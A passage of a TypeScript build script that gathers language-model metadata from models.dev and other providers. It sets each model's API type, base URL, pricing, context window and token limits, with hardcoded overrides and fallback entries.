m.name || modelId, + api: "openai-completions", + provider: "zai", + baseUrl: "https://api.z.ai/api/coding/paas/v4", + reasoning: m.reasoning === true, + input: supportsImage ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + compat: { + supportsDeveloperRole: false, + thinkingFormat: "zai", + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Mistral models + if (data.mistral?.models) { + for (const [modelId, model] of Object.entries(data.mistral.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "mistral-conversations", + provider: "mistral", + baseUrl: "https://api.mistral.ai", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Hugging Face models + if (data.huggingface?.models) { + for (const [modelId, model] of Object.entries(data.huggingface.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "huggingface", + baseUrl: "https://router.huggingface.co/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + compat: { + supportsDeveloperRole: false, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process OpenCode models (Zen and Go) + // API mapping based on provider.npm field: + // - @ai-sdk/openai → openai-responses + // - @ai-sdk/anthropic → anthropic-messages + // - @ai-sdk/google → google-generative-ai + // - null/undefined/@ai-sdk/openai-compatible → openai-completions + const opencodeVariants = [ + { key: "opencode", provider: "opencode", basePath: "https://opencode.ai/zen" }, + { key: "opencode-go", provider: "opencode-go", basePath: "https://opencode.ai/zen/go" }, + ] as const; + + for (const variant of opencodeVariants) { + if (!data[variant.key]?.models) continue; + + for (const [modelId, model] of Object.entries(data[variant.key].models)) { + const m = model as ModelsDevModel & { status?: string }; + if (m.tool_call !== true) continue; + if (m.status === "deprecated") continue; + + const npm = m.provider?.npm; + let api: Api; + let baseUrl: string; + + if (npm === "@ai-sdk/openai") { + api = "openai-responses"; + baseUrl = `${variant.basePath}/v1`; + } else if (npm === "@ai-sdk/anthropic") { + api = "anthropic-messages"; + // Anthropic SDK appends /v1/messages to baseURL + baseUrl = variant.basePath; + } else if (npm === "@ai-sdk/google") { + api = "google-generative-ai"; + baseUrl = `${variant.basePath}/v1`; + } else { + // null, undefined, or @ai-sdk/openai-compatible + api = "openai-completions"; + baseUrl = `${variant.basePath}/v1`; + } + + models.push({ + id: modelId, + name: m.name || modelId, + api, + provider: variant.provider, + baseUrl, + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process GitHub Copilot models + if (data["github-copilot"]?.models) { + for (const [modelId, model] of Object.entries(data["github-copilot"].models)) { + const m = model as ModelsDevModel & { status?: string }; + if (m.tool_call !== true) continue; + if (m.status === "deprecated") continue; + + // Claude 4.x models route to Anthropic Messages API + const isCopilotClaude4 = /^claude-(haiku|sonnet|opus)-4([.\-]|$)/.test(modelId); + // gpt-5 models require responses API, others use completions + const needsResponsesApi = modelId.startsWith("gpt-5") || modelId.startsWith("oswe"); + + const api: Api = isCopilotClaude4 + ? "anthropic-messages" + : needsResponsesApi + ? "openai-responses" + : "openai-completions"; + + const copilotModel: Model = { + id: modelId, + name: m.name || modelId, + api, + provider: "github-copilot", + baseUrl: "https://api.individual.githubcopilot.com", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 128000, + maxTokens: m.limit?.output || 8192, + headers: { ...COPILOT_STATIC_HEADERS }, + // compat only applies to openai-completions + ...(api === "openai-completions" ? { + compat: { + supportsStore: false, + supportsDeveloperRole: false, + supportsReasoningEffort: false, + }, + } : {}), + }; + + models.push(copilotModel); + } + } + + // Process MiniMax models + const minimaxVariants = [ + { key: "minimax", provider: "minimax", baseUrl: "https://api.minimax.io/anthropic" }, + { key: "minimax-cn", provider: "minimax-cn", baseUrl: "https://api.minimaxi.com/anthropic" }, + ] as const; + + for (const { key, provider, baseUrl } of minimaxVariants) { + if (data[key]?.models) { + for (const [modelId, model] of Object.entries(data[key].models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "anthropic-messages", + provider, + // MiniMax's Anthropic-compatible API - SDK appends /v1/messages + baseUrl, + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + } + + // Process Kimi For Coding models + if (data["kimi-for-coding"]?.models) { + for (const [modelId, model] of Object.entries(data["kimi-for-coding"].models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "anthropic-messages", + provider: "kimi-coding", + // Kimi For Coding's Anthropic-compatible API - SDK appends /v1/messages + baseUrl: "https://api.kimi.com/coding", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + console.log(`Loaded ${models.length} tool-capable models from models.dev`); + return models; + } catch (error) { + console.error("Failed to load models.dev data:", error); + return []; + } +} + +async function generateModels() { + // Fetch models from both sources + // models.dev: Anthropic, Google, OpenAI, Groq, Cerebras + // OpenRouter: xAI and other providers (excluding Anthropic, Google, OpenAI) + // AI Gateway: OpenAI-compatible catalog with tool-capable models + const modelsDevModels = await loadModelsDevData(); + const openRouterModels = await fetchOpenRouterModels(); + const aiGatewayModels = await fetchAiGatewayModels(); + + // Combine models (models.dev has priority) + const allModels = [...modelsDevModels, ...openRouterModels, ...aiGatewayModels].filter( + (model) => + !((model.provider === "opencode" || model.provider === "opencode-go") && model.id === "gpt-5.3-codex-spark"), + ); + + // Fix incorrect cache pricing for Claude Opus 4.5 from models.dev + // models.dev has 3x the correct pricing (1.5/18.75 instead of 0.5/6.25) + const opus45 = allModels.find(m => m.provider === "anthropic" && m.id === "claude-opus-4-5"); + if (opus45) { + opus45.cost.cacheRead = 0.5; + opus45.cost.cacheWrite = 6.25; + } + + // Temporary overrides until upstream model metadata is corrected. + for (const candidate of allModels) { + if (candidate.provider === "amazon-bedrock" && candidate.id.includes("anthropic.claude-opus-4-6-v1")) { + candidate.cost.cacheRead = 0.5; + candidate.cost.cacheWrite = 6.25; + candidate.contextWindow = 1000000; + } + if (candidate.provider === "amazon-bedrock" && candidate.id.includes("anthropic.claude-sonnet-4-6")) { + candidate.contextWindow = 1000000; + } + if ( + (candidate.provider === "anthropic" || + candidate.provider === "opencode" || + candidate.provider === "opencode-go") && + (candidate.id === "claude-opus-4-6" || + candidate.id === "claude-sonnet-4-6" || + candidate.id === "claude-opus-4.6" || + candidate.id === "claude-sonnet-4.6") + ) { + candidate.contextWindow = 1000000; + } + if ( + candidate.provider === "google-antigravity" && + (candidate.id === "claude-opus-4-6-thinking" || candidate.id === "claude-sonnet-4-6") + ) { + candidate.contextWindow = 1000000; + } + // OpenCode variants list Claude Sonnet 4/4.5 with 1M context, actual limit is 200K + if ( + (candidate.provider === "opencode" || candidate.provider === "opencode-go") && + (candidate.id === "claude-sonnet-4-5" || candidate.id === "claude-sonnet-4") + ) { + candidate.contextWindow = 200000; + } + if ((candidate.provider === "opencode" || candidate.provider === "opencode-go") && candidate.id === "gpt-5.4") { + candidate.contextWindow = 272000; + candidate.maxTokens = 128000; + } + if (candidate.provider === "openai" && candidate.id === "gpt-5.4") { + candidate.contextWindow = 272000; + candidate.maxTokens = 128000; + } + // Keep selected OpenRouter model metadata stable until upstream settles. + if (candidate.provider === "openrouter" && candidate.id === "moonshotai/kimi-k2.5") { + candidate.cost.input = 0.41; + candidate.cost.output = 2.06; + candidate.cost.cacheRead = 0.07; + candidate.maxTokens = 4096; + } + if (candidate.provider === "openrouter" && candidate.id === "z-ai/glm-5") { + candidate.cost.input = 0.6; + candidate.cost.output = 1.9; + candidate.cost.cacheRead = 0.119; + } + } + + + // Add missing EU Opus 4.6 profile + if (!allModels.some((m) => m.provider === "amazon-bedrock" && m.id === "eu.anthropic.claude-opus-4-6-v1")) { + allModels.push({ + id: "eu.anthropic.claude-opus-4-6-v1", + name: "Claude Opus 4.6 (EU)", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: true, + input: ["text", "image"], + cost: { + input: 5, + output: 25, + cacheRead: 0.5, + cacheWrite: 6.25, + }, + contextWindow: 1000000, + maxTokens: 128000, + }); + } + + // Add missing Claude Opus 4.6 + if (!allModels.some(m => m.provider === "anthropic" && m.id === "claude-opus-4-6")) { + allModels.push({ + id: "claude-opus-4-6", + name: "Claude Opus 4.6", + api: "anthropic-messages", + baseUrl: "https://api.anthropic.com", + provider: "anthropic", + reasoning: true, + input: ["text", "image"], + cost: { + input: 5, + output: 25, + cacheRead: 0.5, + cacheWrite: 6.25, + }, + contextWindow: 1000000, + maxTokens: 128000, + }); + } + + // Add missing Claude Sonnet 4.6 + if (!allModels.some(m => m.provider === "anthropic" && m.id === "claude-sonnet-4-6")) { + allModels.push({ + id: "claude-sonnet-4-6", + name: "Claude Sonnet 4.6", + api: "anthropic-messages", + baseUrl: "https://api.anthropic.com", + provider: "anthropic", + reasoning: true, + input: ["text", "image"], + cost: { + input: 3, + output: 15, + cacheRead: 0.3, + cacheWrite: 3.75, + }, + contextWindow: 1000000, + maxTokens: 64000, + }); + } + + // Add missing Gemini 3.1 Flash Lite Preview until models.dev includes it. + if (!allModels.some((m) => m.provider === "google" && m.id === "gemini-3.1-flash-lite-preview")) { + allModels.push({ + id: "gemini-3.1-flash-lite-preview", + name: "Gemini 3.1 Flash Lite Preview", + api: "google-generative-ai", + baseUrl: "https://generativelanguage.googleapis.com/v1beta", + provider: "google", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 1048576, + maxTokens: 65536, + }); + } + + // Add missing gpt models + if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5-chat-latest")) { + allModels.push({ + id: "gpt-5-chat-latest", + name: "GPT-5 Chat Latest", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: false, + input: ["text", "image"], + cost: { + input: 1.25, + output: 10, + cacheRead: 0.125, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 16384, + }); + } + + if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.1-codex")) { + allModels.push({ + id: "gpt-5.1-codex", + name: "GPT-5.1 Codex", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: true, + input: ["text", "image"], + cost: { + input: 1.25, + output: 5, + cacheRead: 0.125, + cacheWrite: 1.25, + }, + contextWindow: 400000, + maxTokens: 128000, + }); + } + + if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.1-codex-max")) { + allModels.push({ + id: "gpt-5.1-codex-max", + name: "GPT-5.1 Codex Max", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: true, + input: ["text", "image"], + cost: { + input: 1.25, + output: 10, + cacheRead: 0.125, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + }); + } + + if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.3-codex-spark")) { + allModels.push({ + id: "gpt-5.3-codex-spark", + name: "GPT-5.3 Codex Spark", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 16384, + }); + } + + // Add missing GitHub Copilot GPT-5.3 models until models.dev includes them. + const copilotBaseModel = allModels.find( + (m) => m.provider === "github-copilot" && m.id === "gpt-5.2-codex", + ); + if (copilotBaseModel) { + if (!allModels.some((m) => m.provider === "github-copilot" && m.id === "gpt-5.3-codex")) { + allModels.push({ + ...copilotBaseModel, + id: "gpt-5.3-codex", + name: "GPT-5.3 Codex", + }); + } + } + + if (!allModels.some((m) => m.provider === "openai" && m.id === "gpt-5.4")) { + allModels.push({ + id: "gpt-5.4", + name: "GPT-5.4", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: true, + input: ["text", "image"], + cost: { + input: 2.5, + output: 15, + cacheRead: 0.25, + cacheWrite: 0, + }, + contextWindow: 272000, + maxTokens: 128000, + }); + } + + // OpenAI Codex (ChatGPT OAuth) models + // NOTE: These are not fetched from models.dev; we keep a small, explicit list to avoid aliases. + // Context window is based on observed server limits (400s above ~272k), not marketing numbers. + const CODEX_BASE_URL = "https://chatgpt.com/backend-api"; + const CODEX_CONTEXT = 272000; + const CODEX_MAX_TOKENS = 128000; + const codexModels: Model<"openai-codex-responses">[] = [ + { + id: "gpt-5.1", + name: "GPT-5.1", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.1-codex-max", + name: "GPT-5.1 Codex Max", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.1-codex-mini", + name: "GPT-5.1 Codex Mini", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.25, output: 2, cacheRead: 0.025, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.2", + name: "GPT-5.2", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.2-codex", + name: "GPT-5.2 Codex", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.3-codex", + name: "GPT-5.3 Codex", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.4", + name: "GPT-5.4", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 2.5, output: 15, cacheRead: 0.25, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.3-codex-spark", + name: "GPT-5.3 Codex Spark", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 128000, + maxTokens: CODEX_MAX_TOKENS, + }, + ]; + allModels.push(...codexModels); + + // Add missing Grok models + if (!allModels.some(m => m.provider === "xai" && m.id === "grok-code-fast-1")) { + allModels.push({ + id: "grok-code-fast-1", + name: "Grok Code Fast 1", + api: "openai-completions", + baseUrl: "https://api.x.ai/v1", + provider: "xai", + reasoning: false, + input: ["text"], + cost: { + input: 0.2, + output: 1.5, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 32768, + maxTokens: 8192, + }); + } + + // Add "auto" alias for openrouter/auto + if (!allModels.some(m => m.provider === "openrouter" && m.id === "auto")) { + allModels.push({ + id: "auto", + name: "Auto", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + // we dont know about the costs because OpenRouter auto routes to different models + // and then charges you for the underlying used model + input:0, + output:0, + cacheRead:0, + cacheWrite:0, + }, + contextWindow: 2000000, + maxTokens: 30000, + }); + } + + // Google Cloud Code Assist models (Gemini CLI) + // Uses production endpoint, standard Gemini models only + const CLOUD_CODE_ASSIST_ENDPOINT = "https://cloudcode-pa.googleapis.com"; + const cloudCodeAssistModels: Model<"google-gemini-cli">[] = [ + { + id: "gemini-2.5-pro", + name: "Gemini 2.5 Pro (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-2.5-flash", + name: "Gemini 2.5 Flash (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-2.0-flash", + name: "Gemini 2.0 Flash (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: false, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 8192, + }, + { + id: "gemini-3-pro-preview", + name: "Gemini 3 Pro Preview (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-3-flash-preview", + name: "Gemini 3 Flash Preview (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-3.1-pro-preview", + name: "Gemini 3.1 Pro Preview (Cloud Code Assist)", + api: "google-gemini-cli", + provider: "google-gemini-cli", + baseUrl: CLOUD_CODE_ASSIST_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + ]; + allModels.push(...cloudCodeAssistModels); + + // Antigravity models (Gemini 3, Claude, GPT-OSS via Google Cloud) + // Uses sandbox endpoint and different OAuth credentials for access to additional models + const ANTIGRAVITY_ENDPOINT = "https://daily-cloudcode-pa.sandbox.googleapis.com"; + const antigravityModels: Model<"google-gemini-cli">[] = [ + { + id: "gemini-3.1-pro-high", + name: "Gemini 3.1 Pro High (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + // the Model type doesn't seem to support having extended-context costs, so I'm just using the pricing for <200k input + cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 2.375 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-3.1-pro-low", + name: "Gemini 3.1 Pro Low (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + // the Model type doesn't seem to support having extended-context costs, so I'm just using the pricing for <200k input + cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 2.375 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "gemini-3-flash", + name: "Gemini 3 Flash (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.5, output: 3, cacheRead: 0.5, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65535, + }, + { + id: "claude-sonnet-4-5", + name: "Claude Sonnet 4.5 (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: false, + input: ["text", "image"], + cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 }, + contextWindow: 200000, + maxTokens: 64000, + }, + { + id: "claude-sonnet-4-5-thinking", + name: "Claude Sonnet 4.5 Thinking (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 }, + contextWindow: 200000, + maxTokens: 64000, + }, + { + id: "claude-opus-4-5-thinking", + name: "Claude Opus 4.5 Thinking (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 }, + contextWindow: 200000, + maxTokens: 64000, + }, + { + id: "claude-opus-4-6-thinking", + name: "Claude Opus 4.6 Thinking (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 }, + contextWindow: 200000, + maxTokens: 128000, + }, + { + id: "claude-sonnet-4-6", + name: "Claude Sonnet 4.6 (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: true, + input: ["text", "image"], + cost: { input: 3, output: 15, cacheRead: 0.3, cacheWrite: 3.75 }, + contextWindow: 200000, + maxTokens: 64000, + }, + { + id: "gpt-oss-120b-medium", + name: "GPT-OSS 120B Medium (Antigravity)", + api: "google-gemini-cli", + provider: "google-antigravity", + baseUrl: ANTIGRAVITY_ENDPOINT, + reasoning: false, + input: ["text"], + cost: { input: 0.09, output: 0.36, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 131072, + maxTokens: 32768, + }, + ]; + allModels.push(...antigravityModels); + + const VERTEX_BASE_URL = "https://{location}-aiplatform.googleapis.com"; + const vertexModels: Model<"google-vertex">[] = [ + { + id: "gemini-3-pro-preview", + name: "Gemini 3 Pro Preview (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 }, + contextWindow: 1000000, + maxTokens: 64000, + }, + { + id: "gemini-3.1-pro-preview", + name: "Gemini 3.1 Pro Preview (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-3-flash-preview", + name: "Gemini 3 Flash Preview (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.5, output: 3, cacheRead: 0.05, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.0-flash", + name: "Gemini 2.0 Flash (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: false, + input: ["text", "image"], + cost: { input: 0.15, output: 0.6, cacheRead: 0.0375, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 8192, + }, + { + id: "gemini-2.0-flash-lite", + name: "Gemini 2.0 Flash Lite (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.075, output: 0.3, cacheRead: 0.01875, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.5-pro", + name: "Gemini 2.5 Pro (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.5-flash", + name: "Gemini 2.5 Flash (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.3, output: 2.5, cacheRead: 0.03, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.5-flash-lite-preview-09-2025", + name: "Gemini 2.5 Flash Lite Preview 09-25 (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.1, output: 0.4, cacheRead: 0.01, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-2.5-flash-lite", + name: "Gemini 2.5 Flash Lite (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.1, output: 0.4, cacheRead: 0.01, cacheWrite: 0 }, + contextWindow: 1048576, + maxTokens: 65536, + }, + { + id: "gemini-1.5-pro", + name: "Gemini 1.5 Pro (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: false, + input: ["text", "image"], + cost: { input: 1.25, output: 5, cacheRead: 0.3125, cacheWrite: 0 }, + contextWindow: 1000000, + maxTokens: 8192, + }, + { + id: "gemini-1.5-flash", + name: "Gemini 1.5 Flash (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: false, + input: ["text", "image"], + cost: { input: 0.075, output: 0.3, cacheRead: 0.01875, cacheWrite: 0 }, + contextWindow: 1000000, + maxTokens: 8192, + }, + { + id: "gemini-1.5-flash-8b", + name: "Gemini 1.5 Flash-8B (Vertex)", + api: "google-vertex", + provider: "google-vertex", + baseUrl: VERTEX_BASE_URL, + reasoning: false, + input: ["text", "image"], + cost: { input: 0.0375, output: 0.15, cacheRead: 0.01, cacheWrite: 0 }, + contextWindow: 1000000, + maxTokens: 8192, + }, + ]; + allModels.push(...vertexModels); + + // Kimi For Coding models (Moonshot AI's Anthropic-compatible coding API) + // Static fallback in case models.dev doesn't have them yet + const KIMI_CODING_BASE_URL = "https://api.kimi.com/coding"; + const kimiCodingModels: Model<"anthropic-messages">[] = [ + { + id: "kimi-k2-thinking", + name: "Kimi K2 Thinking", + api: "anthropic-messages", + provider: "kimi-coding", + baseUrl: KIMI_CODING_BASE_URL, + reasoning: true, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 262144, + maxTokens: 32768, + }, + { + id: "k2p5", + name: "Kimi K2.5", + api: "anthropic-messages", + provider: "kimi-coding", + baseUrl: KIMI_CODING_BASE_URL, + reasoning: true, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 262144, + maxTokens: 32768, + }, + ]; + // Only add if not already present from models.dev + for (const model of kimiCodingModels) { + if (!allModels.some(m => m.provider === "kimi-coding" && m.id === model.id)) { + allModels.push(model); + } + } + + const azureOpenAiModels: Model[] = allModels + .filter((model) => model.provider === "openai" && model.api === "openai-responses") + .map((model) => ({ + ...model, + api: "azure-openai-responses", + provider: "azure-openai-responses", + baseUrl: "", + })); + allModels.push(...azureOpenAiModels); + + // Group by provider and deduplicate by model ID + const providers: Record>> = {}; + for (const model of allModels) { + if 